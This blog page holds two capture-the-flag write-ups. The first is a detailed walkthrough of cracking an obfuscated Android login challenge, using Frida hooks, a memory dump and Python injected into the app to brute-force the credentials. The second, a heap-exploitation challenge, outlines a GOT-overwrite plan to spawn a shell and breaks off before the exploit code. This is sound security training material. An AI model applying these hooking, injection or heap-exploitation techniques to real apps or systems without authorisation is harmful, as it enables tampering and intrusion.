TEAMROCKETIST

[Reverse] O-MVLL/dProtect - Chapter 01: PyDroid

2023-07-22T04:44:07.000Z

PyDroid

Description:
The objective of this challenge is to find the correct login/password that leads to “Access Granted”.
Challenge
Attachment:
download
a0b07e97197e2dfe48bb7df65dba4f145d485660ecf4bd0d3ab65b14039ec8d6
Author: romainthomas

The application has a simple login screen:

Checking the source code in jadx:

1	$ jadx-gui apks/challenge-pydroid.apk 2>&1 >/dev/null &

We see that the code behind the check is inside a native function:

Installing the app and running frida:

$ adb install apks/challenge-pydroid.apk
$ adb root
$ curl -L https://github.com/frida/frida/releases/download/15.1.13/frida-server-15.1.13-android-arm64.xz | unxz | adb shell "cat > /data/local/frida-server-15.1.13 && chmod 755 /data/local/frida-server-15.1.13"
$ adb shell "/data/local/frida-server-15.1.13 &"
$ pip install frida==15.1.13

Searching with ctrl+shift+f for system.load in jadx we can find where the lib is being loaded:

Let’s write a script to decrypt the string and see what the name of the lib that is being loaded:

Java.perform(function(){
    let Application = Java.use("re.obfuscator.challenge01.Application");
    console.log(Application["de"]("\uf74d\uf71c\uf75c\uf74a\uf718\uf71a"));
});

Injecting the script on boot:

1 2	$ frida -l decryptString.js -f re.obfuscator.challenge01 --no-pause [Pixel 4 XL::re.obfuscator.challenge01 ]-> a1re03

It seems like the library name is a1re03, since it’s using the api call system.loadLibrary we should find a file with the prefix lib liba1re03.so:

1
2
3

$ apktool d apks/challenge-pydroid.apk -o challenge-pydroid 
$ ls challenge-pydroid/lib/arm64-v8a
liba1re03.so

Openning the library in ghidra we can see and check the entrypoints, and we can see the .init_array is not initialised:

I tried to search for functions in the symbol-tree with the prefix java_ but didn’t find any, so I believe the linking between Java and the native code should be done with the registerNatives function somewhere in the JNI_OnLoad function:

It seems like there will be an indirect call, so instead of diving into the code, I used jnitrace to trace the function JNI->registerNatives to locate in ghidra the respective code related to the native function in Java:

$ jnitrace -l liba1re03.so re.obfuscator.challenge01 -i RegisterNatives
           /* TID 22199 */
    239 ms [+] JNIEnv->RegisterNatives
    239 ms |- JNIEnv*          : 0xb400007cb2c51df0
    239 ms |- jclass           : 0x95    { re/obfuscator/challenge01/VCyPLJeiyfu }
    239 ms |- JNINativeMethod* : 0x7febbf85c0
    239 ms |:     0x7b66211428 - PGPyIMEWUxFr(Ljava/lang/String;)Z
    239 ms |- jint             : 1
    239 ms |= jint             : 0

    239 ms --------------------------------Backtrace--------------------------------
    239 ms |->       0x7b661ab0ac: liba1re03.so!0x1720ac (liba1re03.so:0x7b66039000)
    239 ms |->       0x7b661ab0ac: liba1re03.so!0x1720ac (liba1re03.so:0x7b66039000)

We can see where register natives is being called at 0x1720ac. To see the code in ghidra, we can just go to the address 0x1720ac + 0x100000 (We need to add 100k because ghidra by default will load the lib at that address).

The logic we truly want to check on is the function PGPyIMEWUxFr, jnitrace will give us the base address of the lib and the address of the start of the function, so basically, to calculate its real offset in ghidra we could just do 0x7b66211428-0x7b66039000+0x100000 = 0x2d8428.

A lot of functions are not decompiled in ghidra and didn’t perform the backtrack references through the code, mostly because of some of the techniques used described here.

Due to this problem, I decided to dump the library from memory and fix the elf and in some way solve some of the problems generated by this, also we know omvll is based of o-llvm and some versions uses globals for the strings, based on experience the fastest way to circuvent string encryption for global variables is to use a dump, this is also described in the documentation.

We could write our own frida script to dump from memory, but to save time. There are already some scripts that perform the dump and fix the elf for us. One example of such is this frida_dump

Perhaps we will encounter a problem while trying to dump (the code will dump the specified lib in the frontmost application):

$ python dump_so.py liba1re03.so
...
frida.core.RPCException: Error: access violation accessing 0x7b6cdcf000
    at  (frida/runtime/core.js:138)
    at dumpmodule (/script1.js:12)
    at apply (native)
    at  (frida/runtime/message-dispatcher.js:13)
    at c (frida/runtime/message-dispatcher.js:23)

Seems like there is a section of the lib that doesn’t have read permissions, to solve this we must adapt the dump_so.js to change the memory region, also this line of code doesn’t seem to fully work:

1
2
3

...
Memory.protect(ptr(libso.base), libso.size, 'rwx');
...

If we investigate the address mapping:

$ adb shell "ps | grep -i 're.obfuscator.challenge01'"
u0_a282      22584  9119 15130452 373024 SyS_epoll_wait     0 S re.obfuscator.challenge01
$ adb shell "cat /proc/22584/maps | grep 'liba1re03.so'"
7b6b4d1000-7b6b910000 rwxp 00000000 fd:04 143995                         /data/app/~~wo0sC2WdNe1hirJvBsr8gQ==/re.obfuscator.challenge01-jU98uNg4F1DuhOs3utp2zA==/lib/arm64/liba1re03.so
7b6b910000-7b6b919000 r--p 0043e000 fd:04 143995                         /data/app/~~wo0sC2WdNe1hirJvBsr8gQ==/re.obfuscator.challenge01-jU98uNg4F1DuhOs3utp2zA==/lib/arm64/liba1re03.so
7b6b919000-7b6cdc7000 rw-p 00446000 fd:04 143995                         /data/app/~~wo0sC2WdNe1hirJvBsr8gQ==/re.obfuscator.challenge01-jU98uNg4F1DuhOs3utp2zA==/lib/arm64/liba1re03.so
7b6edc6000-7b6eeef000 rwxp 018f5000 fd:04 143995                         /data/app/~~wo0sC2WdNe1hirJvBsr8gQ==/re.obfuscator.challenge01-jU98uNg4F1DuhOs3utp2zA==/lib/arm64/liba1re03.so

Maybe because changing the entire permissions of lib may cause some problems to solve this, we just adapt that special region of memory and do this:

1	Memory.protect(ptr(0x7b6cdcf000), libso.size-(0x7b6cdcf000-libso.base), 'rwx');

Since we are attaching to the process, we don’t need to update the address 0x7b6cdcf000 but if you are trying to do the same, you will need to update your address depending on the error.

$ python dump_so.py liba1re03.so
{'name': 'liba1re03.so', 'base': '0x7b6b4d1000', 'size': 60940288, 'path': '/data/app/~~wo0sC2WdNe1hirJvBsr8gQ==/re.obfuscator.challenge01-jU98uNg4F1DuhOs3utp2zA==/lib/arm64/liba1re03.so'}
android/SoFixer64: 1 file pushed, 0 skipped. 22.3 MB/s (186656 bytes in 0.008s)
liba1re03.so.dump.so: 1 file pushed, 0 skipped. 37.3 MB/s (60940288 bytes in 1.558s)
adb shell /data/local/tmp/SoFixer -m 0x7b6b4d1000 -s /data/local/tmp/liba1re03.so.dump.so -o /data/local/tmp/liba1re03.so.dump.so.fix.so
[main_loop:87]start to rebuild elf file
[Load:69]dynamic segment have been found in loadable segment, argument baseso will be ignored.
[RebuildPhdr:25]=============LoadDynamicSectionFromBaseSource==========RebuildPhdr=========================
[RebuildPhdr:37]=====================RebuildPhdr End======================
[ReadSoInfo:549]=======================ReadSoInfo=========================
[ReadSoInfo:696]soname 
[ReadSoInfo:699]Unused DT entry: type 0x6ffffffb arg 0x00000001
[ReadSoInfo:699]Unused DT entry: type 0x00000009 arg 0x00000018
[ReadSoInfo:699]Unused DT entry: type 0x6ffffff9 arg 0x00002d60
[ReadSoInfo:591] plt_rel (DT_JMPREL) found at 498a8
[ReadSoInfo:595] plt_rel_count (DT_PLTRELSZ) 549
[ReadSoInfo:584]symbol table found at 38f5000
[ReadSoInfo:580]string table found at 393b7a0
[ReadSoInfo:699]Unused DT entry: type 0x6ffffef5 arg 0x03a12219
[ReadSoInfo:629] constructors (DT_INIT_ARRAY) found at 445738
[ReadSoInfo:633] constructors (DT_INIT_ARRAYSZ) 13
[ReadSoInfo:637] destructors (DT_FINI_ARRAY) found at 445728
[ReadSoInfo:641] destructors (DT_FINI_ARRAYSZ) 2
[ReadSoInfo:699]Unused DT entry: type 0x6ffffff0 arg 0x03a0c421
[ReadSoInfo:699]Unused DT entry: type 0x6ffffffe arg 0x00003c68
[ReadSoInfo:699]Unused DT entry: type 0x6fffffff arg 0x00000003
[ReadSoInfo:703]=======================ReadSoInfo End=========================
[RebuildShdr:42]=======================RebuildShdr=========================
[RebuildShdr:536]=====================RebuildShdr End======================
[RebuildRelocs:783]=======================RebuildRelocs=========================
[RebuildRelocs:809]=======================RebuildRelocs End=======================
[RebuildFin:709]=======================try to finish file rebuild =========================
[RebuildFin:733]=======================End=========================
[main:123]Done!!!
/data/local/tmp/liba1re03.so.dump.so.fix.so: 1 file pulled, 0 skipped. 38.0 MB/s (60941163 bytes in 1.528s)
liba1re03.so_0x7b6b4d1000_60940288_fix.so

Now if we view .init_array section we can see a bunch of pointers to functions that will initialize globals and important stuff for the lib:

_INIT_4 seems to have some python code related to the flag:

Extracting the code from the string we get:

import android
from android import decode, hash
import json
data = json.loads(json_data)
login, password = data

login    = decode(login)
password = decode(password)

flag = login + password
h = hash(flag).hex()
if h != android.__FLAG__:
  android.print("Humm it looks like, it's not the good flag ...")
  android.print("It should be {} while it is {}".format(android.__FLAG__, h))
else:
  android.print("Well done!")
  is_valid = True

It seems flag check is being done here, and the flag is the combination of login and password, looks like the function hash is from a custom module named android, for now we still don’t know what is the value of android.__FLAG__ and what the function hash does, but if look into adb logcat we can actually see the function print is just some logging function which will appear in the logcat:

1
2
3

adb shell logcat | grep 'omvll'
07-23 00:34:09.465 23655 23655 I omvll   : Humm it looks like, it's not the good flag ...
07-23 00:34:09.465 23655 23655 I omvll   : It should be f5ca458deb9629a74d4b0c3669deb5078a6a85a90afba9a3c76f5306a4bafb06 while it is e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

It looks like the concatenation of the login and password should be e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 after applying the hash function, from the size of the hash it looks like this is some kind of sha256 but we need confirmation.

We could try to look in the native lib where the module is being initiated or loaded, but since we know that the global variable is located at 0x548778 - 0x100000 we can just write a frida script and inject our own python code to inspect this module!

var libname = "liba1re03.so";
var moduleBaseAddress = Module.findBaseAddress(libname);
var ghidra_base = 0x100000;
const inject_python = `import android
from android import decode, hash
android.print(hash('abc').hex())`;
const python_addr = moduleBaseAddress.add(0x548778-ghidra_base);
python_addr.writeUtf8String(inject_python);

The output:

$ echo -n 'abc' | sha256sum
ba7816bf8f01cfea414140de5dae2223b00361a396177a9cb410ff61f20015ad
$ frida -Ul inj_k.js -F --no-pause
$ adb shell logcat | grep 'omvll' # login in the app to trigger the print
07-23 01:54:37.928 24105 24105 I omvll   : ba7816bf8f01cfea414140de5dae2223b00361a396177a9cb410ff61f20015ad

This confirms that we indeed are dealing with sha256 hash. When I got this confirmation, I said to myself that there is no way this challenge is to bruteforce the login and password with a dictionary attack or something. I started to believe that maybe the dev left something within the custom android module that is not being used in the main script that could give us some tips about how the hash got generated or something:

var libname = "liba1re03.so";
var moduleBaseAddress = Module.findBaseAddress(libname);
var ghidra_base = 0x100000;
const inject_python = `import android
from android import decode, hash
android.print(str(dir(android)))`;
const python_addr = moduleBaseAddress.add(0x548778-ghidra_base);
python_addr.writeUtf8String(inject_python);

And we saw 3 interesting fields MvtKNJXCOGJe, __bc__ and __doc__.

1	07-23 15:28:56.809 27698 27698 I omvll : ['MvtKNJXCOGJe', '__FLAG__', '__bc__', '__doc__', '__loader__', '__name__', '__package__', '__spec__', 'decode', 'hash', 'print']

MvtKNJXCOGJe is a function that receives a string and returns bytes:

1	android.print(str(android.MvtKNJXCOGJe.__doc__));

The documentation of the function:

1	I omvll : MvtKNJXCOGJe(arg0: str) -> bytes

__bc__ seems to be a sequence of python bytecode which, after removing the new lines and decode hex data we get something very similar to a pyc file ? (header seems to be different and decompilers won’t work)

1	android.print(str(android.__bc__));

7-23 21:24:54.840 29800 29800 I omvll   :     700d0d0a000000004aaf626335010000e300000000000000000000000000000000040000004
07-23 21:24:54.840 29800 29800 I omvll   :     00000007338000000640064016d005a00640064016d015a0164026502640365036604640464
07-23 21:24:54.840 29800 29800 I omvll   :     0583045a04640265026403650366046406640783045a05640153002908e9000000004eda046
...

__doc__ This contains some hash similar to the sha256 but we don’t know yet for what it used.

1	android.print(str(android.__doc__));

1	07-23 21:25:44.407 29800 29800 I omvll : 9c16a9c3017d2b3876323bc4f9dad2b7530c

My next step was to see what code is behind MvtKNJXCOGJe we tried using the built-in module dis to get the disassemble code but it seems the function returns an error:

1	Abort message: 'terminating with uncaught exception of type pybind11::error_already_set: TypeError: don't know how to disassemble builtin_function_or_method objects

This means that this module is being loaded in the native code using cpython or pybind11.

To understand a little better I did some research on google and I learned that you could create a python module using cpython like this:

#include 

static char* __flag__ = "f0d15e5bb173d9a281cfaf2a2b01779a7e78c2b24a48f2cc74563b235c4c5b9b";

// Module method table 
static PyMethodDef AndroidMethods[] = {
    {NULL, NULL, 0, NULL} 
};

// Module definition
static struct PyModuleDef androidmodule = {
    PyModuleDef_HEAD_INIT,
    "android",
    NULL,
    -1,
    AndroidMethods
};

// Module initialization function
PyMODINIT_FUNC PyInit_android(void) {
    PyObject* module = PyModule_Create(&androidmodule);
    
    // Add the __flag__ variable to the module
    PyObject* flag = Py_BuildValue("s", __flag__);
    if (flag) {
        PyModule_AddObject(module, "__flag__", flag);
    }
    
    return module;
}

In a main program we could do something like this:

int main(int argc, char* argv[]) {

    wchar_t** wide_argv = (wchar_t**)malloc(sizeof(wchar_t*) * argc);
    for (int i = 0; i < argc; i++) {
        wide_argv[i] = Py_DecodeLocale(argv[i], NULL);
        if (wide_argv[i] == NULL) {
            fprintf(stderr, "Error decoding argument %d\n", i);
            return 1;
        }
    }
    // Add the "android" module to the pyinittab
    PyImport_AppendInittab("android", &PyInit_android);

    // Initialize the Python interpreter
    Py_Initialize();
    
    // Start the interpreter
    Py_Main(argc, wide_argv);

    // Finalize the Python interpreter
    Py_Finalize();

    return 0;
}

After running:

$ gcc main.c -o interpreter -I/usr/include/python3.11 -L/usr/lib/python3.11/config-3.11-x86_64-linux-gnu -lpython3.11
$ ./interpreter
Python 3.11.2 (main, Mar 13 2023, 12:18:29) [GCC 12.2.0] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> import android
>>> print(android.__flag__)
'f0d15e5bb173d9a281cfaf2a2b01779a7e78c2b24a48f2cc74563b235c4c5b9b'

A good strategy here is to actually find where the string “android” is being called in the android code:

This already looks promissing:

Diving in FUN_00280c08 we can see that there is a function that looks like is adding somekind of variable __flag__ to the module:

Searching for xrefs to those functions lead me to more assignments of __bc__ and __doc__:

But the most important one was the function FUN_002c22b0 contains the print string, which probably means that this function might be responsible for function attribution,
searching for xrefs didn’t find anything which means this is probably some kind of proxy call, so we might need to check some of the internal calls:

Searching for MvtKNJXCOGJe I didn’t find anything, so this means that the author might have used StringEncOptStack instead of StringEncOptGlobal to hide this string, so I assumed that these internal functions are related to function attributions to the python module, probably related to pybind11 so I decided to hook FUN_002ce5cc we know that the second parameter is the name of the function so we can write a frida script to hook this:

var do_dlopen = null;
var call_ctor = null;
var moduleBaseAddress = null;
var hooked = false;
var libname = "liba1re03.so";
var ghidra_base = 0x100000;

Process.findModuleByName(Process.pointerSize === 4 ? 'linker' : 'linker64').enumerateSymbols().forEach(function (sym) {
  if (sym.name.indexOf('do_dlopen') >= 0) {
    do_dlopen = sym.address;
  } else if (sym.name.indexOf('call_constructor') >= 0) {
    call_ctor = sym.address;
  }
});
Interceptor.attach(do_dlopen,{
  onEnter: function(args){
    var soName = args[0].readCString();
    var temp = soName.split("/").pop();
    this.libname = temp;
    if (temp.indexOf(libname) > -1) {
      Interceptor.attach(call_ctor, function () {
        if(hooked == false) {
          moduleBaseAddress = Module.findBaseAddress(temp);
          hooked = true;
          before_init_initarray(temp);
        }
      });
    }
  }, 
  onLeave: function(retval){
    if (this.libname.includes(libname)) {
      after_init_initarray(this.libname);
    }
  }
});


function before_init_initarray(libname){
  Interceptor.attach(moduleBaseAddress.add(0x2ce5cc-ghidra_base),{
    onEnter: function(args){
      console.log(args[1].readCString() + " " + args[2]);
      console.log('called from:\n' +
        Thread.backtrace(this.context, Backtracer.ACCURATE)
        .map(DebugSymbol.fromAddress).join('\n') + '\n');
    },
    onLeave: function(retval){
    }});
}   

function after_init_initarray(libname){}

The code above is not entirely necessary. I added this in case you want to hook something before some function in .init_array executes. This involves hooking some android linker functions and stuff, but it’s not necessary if you really want, you could just attach to the app and only contain the code inside of before_init_initarray function.

$ frida -Ul inj_k2.js -f re.obfuscator.challenge01 --no-pause
# prints will only trigger after performing the login in the app
[Pixel 4 XL::re.obfuscator.challenge01 ]-> 
print
called from:
0x7b6449033c liba1re03.so!0x1c233c
0x7b6449033c liba1re03.so!0x1c233c

MvtKNJXCOGJe
called from:
0x7b644904c4 liba1re03.so!0x1c24c4
0x7b644904c4 liba1re03.so!0x1c24c4

decode
called from:
0x7b644911f8 liba1re03.so!0x1c31f8
0x7b644911f8 liba1re03.so!0x1c31f8

hash
called from:
0x7b644907bc liba1re03.so!0x1c27bc
0x7b644907bc liba1re03.so!0x1c27bc

Looking at the address call 0x1c24c4 + 0x100000 in ghidra:

If we instruct ghidra to disassemble the code:

Let’s hook that line and trigger the call by injecting python:

var libname = "liba1re03.so";
var moduleBaseAddress = Module.findBaseAddress(libname);
var ghidra_base = 0x100000;

// on blr x8 to get the function pointer to the indirect call
Interceptor.attach(moduleBaseAddress.add(0x2c3488-ghidra_base),{
  onEnter: function(args){
    console.log(this.context.x8.sub(moduleBaseAddress).add(ghidra_base));
  },
  onLeave: function(retval){
  }
});

const inject_python = `import android
android.MvtKNJXCOGJe('abc')`;
const python_addr = moduleBaseAddress.add(0x548778-ghidra_base);
python_addr.writeUtf8String(inject_python);

We get the address:

1
2
3

$ frida -Ul inj_k2.js -F --no-pause
# print will trigger only after trying to login
[Pixel 4 XL::Open-Obfuscator Challenge ]-> 0x2c0ea8

After disassembling the function, we get a huge function:

I didn’t want to dive in into this function before understanding the context of this, I could end up reversing an entire function for nothing. So, after analysing the application with more attention, we noticed some files that were dropped into the cache folder /data/data/re.obfuscator.challenge01/cache:

$ adb shell "ls /data/data/re.obfuscator.challenge01/cache/WebView/Default/Web3"
LICENSE.txt
__future__.py
__phello__.foo.py
__pycache__
_aix_support.py
_bootsubprocess.py
_collections_abc.py
_compat_pickle.py
_compression.py
_markupbase.py
_osx_support.py
_py_abc.py
_pydecimal.py
_pyio.py
_sitebuiltins.py
_strptime.py
_sysconfigdata__linux_aarch64-linux-android.py
_threading_local.py
_weakrefset.py
...

By reading the license file, we realized this seems to be the source code of python. Some of the files here are python built-ins. After finding this, we pulled the folder:

1	$ adb pull /data/data/re.obfuscator.challenge01/cache/WebView

By searching for one of the strange variables we found in android module with recursive grep, we found it was referenced in one of the files:

1 2	$ grep -ria '__bc__' WebView WebView/Default/Web3/pyloader.py: return bytes.fromhex(android.__bc__.replace("\n", "").strip().replace(" ", ""))

The python file:

import importlib
from importlib.machinery import SourcelessFileLoader
from importlib.util import spec_from_file_location
import sys
import android

class FileLoader(SourcelessFileLoader):
    def __init__(self):
        super().__init__("checker", "checker.cpython-310.pyc")

    def get_data(self, path: str):
        return bytes.fromhex(android.__bc__.replace("\n", "").strip().replace(" ", ""))


def import_checker():
    loader = FileLoader()
    spec = spec_from_file_location('checker', "checker.cpython-310.pyc",loader=loader)
    module = importlib._bootstrap._load(spec)
    sys.modules['checker'] = module
    return module

Looks like the __bc__ is a hidden module, like I said before we tried before to decompile this specific variable, but it looks like Romain Thomas did change the python source code, making it harder for us to recover the original code. Running this code on our machine also wouldn’t work because of these modifications. The bytecode would throw errors, then I had the idea of actually injecting this code into the interpreter in the application like we did before for other purposes, then we could list all objects in the module and maybe use the builtin dis on the functions to view a better representation of the bytecode:

var libname = "liba1re03.so";
var moduleBaseAddress = Module.findBaseAddress(libname);
var ghidra_base = 0x100000;
const inject_python = `import importlib
from importlib.machinery import SourcelessFileLoader
from importlib.util import spec_from_file_location
import sys
import android,dis,string

class FileLoader(SourcelessFileLoader):
    def __init__(self):
        super().__init__("checker", "checker.cpython-310.pyc")

    def get_data(self, path: str):
        import android
        return bytes.fromhex(android.__bc__.replace("\\n", "").strip().replace(" ", ""))

loader = FileLoader()
spec = spec_from_file_location('checker', "checker.cpython-310.pyc",loader=loader)
module = importlib._bootstrap._load(spec)

android.print(str(dir(module)))`

const python_addr = moduleBaseAddress.add(0x548778-ghidra_base);
python_addr.writeUtf8String(inject_python);

1
2

$ adb logcat | grep 'omvll'
07-24 01:35:30.516 31523 31523 I omvll   : ['__builtins__', '__cached__', '__doc__', '__file__', '__loader__', '__name__', '__package__', '__spec__', 'android', 'check', 'json', 'verify']

I found this interesting function named check, so let’s use dis to disassemble the function and view the code:

var libname = "liba1re03.so";
var moduleBaseAddress = Module.findBaseAddress(libname);
var ghidra_base = 0x100000;
const inject_python = `import importlib
from importlib.machinery import SourcelessFileLoader
from importlib.util import spec_from_file_location
import sys
import android,dis,string

class FileLoader(SourcelessFileLoader):
    def __init__(self):
        super().__init__("checker", "checker.cpython-310.pyc")

    def get_data(self, path: str):
        import android
        return bytes.fromhex(android.__bc__.replace("\\n", "").strip().replace(" ", ""))

loader = FileLoader()
spec = spec_from_file_location('checker', "checker.cpython-310.pyc",loader=loader)
module = importlib._bootstrap._load(spec)

def get_instruction_repr(instruction):
    import dis
    opcode, arg, lineno = instruction.opname,instruction.argval, instruction.starts_line
    if instruction.arg is not None:
        arg_str = f" {arg}"
        return f"{lineno}: {opcode}{arg_str}"
    else:
        return f"{lineno}: {opcode}"
bytecode = dis.Bytecode(module.check)
for instruction in bytecode:
    android.print(get_instruction_repr(instruction))
android.print("android.__doc__ -> "+android.__doc__)`;

const python_addr = moduleBaseAddress.add(0x548778-ghidra_base);
python_addr.writeUtf8String(inject_python);

The code is very simple to understand and we can see a very similar code to the code we saw in the global string comparison with the sha256 hash:

07-24 01:35:30.516 31523 31523 I omvll   : 5: LOAD_GLOBAL json
07-24 01:35:30.516 31523 31523 I omvll   : None: LOAD_METHOD_ENC loads
07-24 01:35:30.516 31523 31523 I omvll   : None: LOAD_FAST data
07-24 01:35:30.516 31523 31523 I omvll   : None: CALL_METHOD 1
07-24 01:35:30.516 31523 31523 I omvll   : None: UNPACK_SEQUENCE 2
07-24 01:35:30.516 31523 31523 I omvll   : None: STORE_FAST login
07-24 01:35:30.516 31523 31523 I omvll   : None: STORE_FAST password
07-24 01:35:30.516 31523 31523 I omvll   : 6: LOAD_GLOBAL android
07-24 01:35:30.516 31523 31523 I omvll   : None: LOAD_METHOD_ENC decode
07-24 01:35:30.516 31523 31523 I omvll   : None: LOAD_FAST login
07-24 01:35:30.516 31523 31523 I omvll   : None: CALL_METHOD 1
07-24 01:35:30.516 31523 31523 I omvll   : None: STORE_FAST login
07-24 01:35:30.517 31523 31523 I omvll   : 7: LOAD_GLOBAL android
07-24 01:35:30.517 31523 31523 I omvll   : None: LOAD_METHOD_ENC decode
07-24 01:35:30.517 31523 31523 I omvll   : None: LOAD_FAST password
07-24 01:35:30.517 31523 31523 I omvll   : None: CALL_METHOD 1
07-24 01:35:30.517 31523 31523 I omvll   : None: STORE_FAST password
07-24 01:35:30.517 31523 31523 I omvll   : 8: LOAD_GLOBAL android
07-24 01:35:30.517 31523 31523 I omvll   : None: LOAD_METHOD_ENC __obfuscated__
07-24 01:35:30.517 31523 31523 I omvll   : None: LOAD_FAST login
07-24 01:35:30.517 31523 31523 I omvll   : None: LOAD_FAST password
07-24 01:35:30.517 31523 31523 I omvll   : None: BINARY_ADD
07-24 01:35:30.517 31523 31523 I omvll   : None: CALL_METHOD 1
07-24 01:35:30.517 31523 31523 I omvll   : None: LOAD_METHOD_ENC hex
07-24 01:35:30.517 31523 31523 I omvll   : None: CALL_METHOD 0
07-24 01:35:30.517 31523 31523 I omvll   : None: LOAD_GLOBAL android
07-24 01:35:30.517 31523 31523 I omvll   : None: LOAD_ATTR __doc__
07-24 01:35:30.517 31523 31523 I omvll   : None: COMPARE_OP ==
07-24 01:35:30.517 31523 31523 I omvll   : None: RETURN_VALUE
07-24 01:38:36.452 31523 31523 I omvll   : 5: LOAD_GLOBAL json
07-24 01:38:36.453 31523 31523 I omvll   : None: LOAD_METHOD_ENC loads
07-24 01:38:36.453 31523 31523 I omvll   : None: LOAD_FAST data
07-24 01:38:36.453 31523 31523 I omvll   : None: CALL_METHOD 1
07-24 01:38:36.453 31523 31523 I omvll   : None: UNPACK_SEQUENCE 2
07-24 01:38:36.453 31523 31523 I omvll   : None: STORE_FAST login
07-24 01:38:36.453 31523 31523 I omvll   : None: STORE_FAST password
07-24 01:38:36.453 31523 31523 I omvll   : 6: LOAD_GLOBAL android
07-24 01:38:36.453 31523 31523 I omvll   : None: LOAD_METHOD_ENC decode
07-24 01:38:36.453 31523 31523 I omvll   : None: LOAD_FAST login
07-24 01:38:36.453 31523 31523 I omvll   : None: CALL_METHOD 1
07-24 01:38:36.453 31523 31523 I omvll   : None: STORE_FAST login
07-24 01:38:36.453 31523 31523 I omvll   : 7: LOAD_GLOBAL android
07-24 01:38:36.453 31523 31523 I omvll   : None: LOAD_METHOD_ENC decode
07-24 01:38:36.453 31523 31523 I omvll   : None: LOAD_FAST password
07-24 01:38:36.453 31523 31523 I omvll   : None: CALL_METHOD 1
07-24 01:38:36.453 31523 31523 I omvll   : None: STORE_FAST password
07-24 01:38:36.453 31523 31523 I omvll   : 8: LOAD_GLOBAL android
07-24 01:38:36.453 31523 31523 I omvll   : None: LOAD_METHOD_ENC __obfuscated__
07-24 01:38:36.453 31523 31523 I omvll   : None: LOAD_FAST login
07-24 01:38:36.453 31523 31523 I omvll   : None: LOAD_FAST password
07-24 01:38:36.453 31523 31523 I omvll   : None: BINARY_ADD
07-24 01:38:36.453 31523 31523 I omvll   : None: CALL_METHOD 1
07-24 01:38:36.453 31523 31523 I omvll   : None: LOAD_METHOD_ENC hex
07-24 01:38:36.454 31523 31523 I omvll   : None: CALL_METHOD 0
07-24 01:38:36.454 31523 31523 I omvll   : None: LOAD_GLOBAL android
07-24 01:38:36.454 31523 31523 I omvll   : None: LOAD_ATTR __doc__
07-24 01:38:36.454 31523 31523 I omvll   : None: COMPARE_OP ==
07-24 01:38:36.454 31523 31523 I omvll   : None: RETURN_VALUE
07-24 01:38:36.454 31523 31523 I omvll   : android.__doc__ -> 9c16a9c3017d2b3876323bc4f9dad2b7530c

The most important part is the fact the function is using a function __obfuscated__ which we believe to be the same as MvtKNJXCOGJe and, instead of comparing the input with android.__flag__ it will compare with android.__doc__ which was the hash we didn’t know what was its purpose.

Again, before going deep into the native code of MvtKNJXCOGJe I did some tests with a few inputs and I realized that the function was a simple encryption function that was encrypting the input byte by byte. Knowing this, I knew we could just bruteforce and get the password:

var libname = "liba1re03.so";
var moduleBaseAddress = Module.findBaseAddress(libname);
var ghidra_base = 0x100000;
const inject_python = `import importlib
from importlib.machinery import SourcelessFileLoader
from importlib.util import spec_from_file_location
import sys
import android,string

res = bytes.fromhex(android.__doc__)
i = 0x0
flag = ''

while i< len(res):
    for c in string.printable:
        _enc = android.MvtKNJXCOGJe(flag+c)[i]
        if _enc == res[i]:
            flag += c
            break
    i +=1
android.print(flag)`;


const python_addr = moduleBaseAddress.add(0x548778-ghidra_base);
python_addr.writeUtf8String(inject_python);

After running we got the password:

1	07-24 01:45:27.152 31523 31523 I omvll : 0MvLL_And_dPr0t3ct

[Pwn] BlackHat MEA CTF 2022 - Robot Factory

2022-10-06T03:00:32.000Z

Robot Factory
48b810dccf228766ce0b217c46b6bb26
https://mega.nz/file/6nRzCBBA#f-2rRYtRo5qfcdilITvYgSScDOreHyel1sLcTlnGDms

TLDR

Perform unsortedbin attack to overwrite global_max_fast.
Use fastbin dup to edit the atoi in GOT address to printf.
Use printf format string to leak LIBC.
Change GOT address of atoi to system.
Spawn a shell with sh.

Analysis

Static Analysis

The binary offers three options new_robot, program_robot and destroy_robot:

Viewing the code new_robot:

From the image above, we know we can’t allocate chunks below 0x101, we can see that the boolean checks, sizes and allocated pointers are being stored in global variables.

We see that calloc is being used and unlike malloc, it won’t reuse freed chunks in tcache linked lists. Due to this, we can’t use tcache poisoning. We must also remember that calloc will begin allocating space with 0s.

Viewing the code destroy_robot:

The code above tells us it sets the boolean check to zero and frees the chunk, because of this, we know we can’t double free (because of the check).

Viewing the code program_robot:

We can edit the contents of the allocated robots in program_robot; we can also see that there is no boolean check. Only an if statement to check if a pointer in robots exists, and since the pointers are never set to zero in delete we can use a use after free vulnerability here.

Debugging

We are given the Dockerfile setup of the server:

FROM ubuntu:18.04

RUN apt-get update && apt-get -y upgrade
RUN useradd -d /home/task/ -m -p task -s /bin/bash task
RUN echo "task:task" | chpasswd

WORKDIR /home/task

COPY main .
COPY flag.txt .
COPY ynetd .
COPY run.sh .
RUN chown -R root:root /home/task
RUN chmod 755 ynetd
RUN chmod 755 main
RUN chmod 777 flag.txt
RUN chmod 755 run.sh

USER task
CMD ["./run.sh"]

From the Dockerfile, we know it’s being run in Ubuntu 18.04 which uses libc-2.27.

Here is the current table (2022-10-06), which might help in CTF challenges:

Version/Libc	libc-2.19	libc-2.23	libc-2.27	libc-2.31	libc-2.35
ubuntu:14.04	x
ubuntu:16.04		x
ubuntu:18.04			x
ubuntu:20.04				x
ubuntu:22.04					x

We can get the correct libc shared library by simply using docker cp:

1	sudo docker cp robot_factory:/lib/x86_64-linux-gnu/libc-2.27.so .

Usually when the Dockerfile is given, I like to do some modifications like installing gdbserver; this way I will be able to get the closest instance environment for debugging (libc versions and offsets in the stack will differ if your environment or libc version on your system is different).

I added the following instalations on the Dockerfile:

1	RUN apt-get update && apt-get -y upgrade && apt-get -y install gdbserver libc6-dbg

It’s time to build the container and run (exposing ports 1337 and 8888):

1 2	sudo docker build -t robot_factory_blackhat . sudo docker run -d --name robot_factory -p 1337:1337 -p 8888:8888 robot_factory_blackhat

The file run.sh contains:

cat run.sh          
#!/bin/bash
echo $FLAG > ./flag.txt
unset FLAG
./ynetd -p 1337 ./main

After this, we can easily attach to the process using a command (the user for Docker must be the same that is running the binary in this case task):

1 2	sudo docker exec --user task robot_factory sh -c "gdbserver :8888 --attach \$(ps -aux \| grep -v 'timeout'"\ "\| grep '0:00 ./main' \| head -n 1 \| awk '{print \$2}')"

To attach to remote process with gdb:

1	pwndbg> target remote :8888

Exploit

Modifying global_max_fast

